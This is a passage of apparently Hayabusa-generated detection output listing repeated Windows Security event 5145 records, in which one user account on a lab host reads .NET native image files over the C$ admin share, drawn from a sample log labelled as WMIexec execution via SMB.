10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\dfsvc\caea217214b52a2ebc7f9e29f0594502 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\EmbeddedLockdown : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\EmbeddedLockdown\d890cdf716b288803af7c42951821885 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\EventViewer : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\EventViewer\508676af4bc32c6cdfa35cb048209b2a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ipamapi : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ipamapi\893f9edeb6b037571dca67c05fad882e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A3ec156ec# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A3ec156ec#\b8fd553238ff003621c581b8a7ab9311 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A26c32abb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A26c32abb#\f51b67a5b93d62c5a6b657ebfd8cdaea : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Abf69f55a# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Abf69f55a#\077014d070d56db90f9a00099da60fa8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B22c61a69# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B22c61a69#\a8aada24560f515d50d1227a4edb9a68 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B46c55d17# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B46c55d17#\a3f0de129553f858134a0e204ddf44c3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.642 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B83e9cb53# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.642 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B83e9cb53#\b2eb2f250605eb6b697ed75a050e9fa1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B3325a29b# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B3325a29b#\2d63d4f586d1192cb1d550c159a42729 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Baa2ca56b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Baa2ca56b#\71d44db8d855f43bafe707aabf0050d7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Bfc9dc24d# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Bfc9dc24d#\d33525eb35c4aa8b45b1e60e144e50ab : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Build : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Build\d6c8ca8dfe9cd143210459e72a546bf8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C8d726d22# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C8d726d22#\95eb335a0d6884a4b311ce7041f71bc3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C25dcfcb8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C25dcfcb8#\81fd3145ed18f31e338ec4dcb5afd7f7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C26a36d2b# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C26a36d2b#\2dab9f12dfcdb3bd487693c1bb12e0a6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ca018eff0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ca018eff0#\4d5abc40df9ad72124f147d1d55dd690 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp\004d51a9ac1d91d6537ad572591ebbd3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.D0ff51f83# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.D0ff51f83#\b7a83293c2e4f23480fc3660b70099e6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G46fcc235# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G46fcc235#\f8fa567f21f9aef0ae471c625b59c159 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G91a07420# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G91a07420#\5d1b6f60febb9cec91a92675a96ee63d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2#\b101a91893057573f159893cb9c2f28d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I0cd65b90# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I0cd65b90#\e037edd0e9a4a487424cd2d4e3527c92 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I7676db1a# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I7676db1a#\aaf7a4161dcd6792ce570a810a0c53f6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ib6702479# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ib6702479#\662c453241af44299325f4c07d7f718c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ic1a2041b# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ic1a2041b#\154acb6c70e2dddd2c94bf0bc748b8b7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ifcaec084# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ifcaec084#\9d9142f584dbdd4e6d4bd7fd6f877b66 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Kd58820a5# : IP Address: 
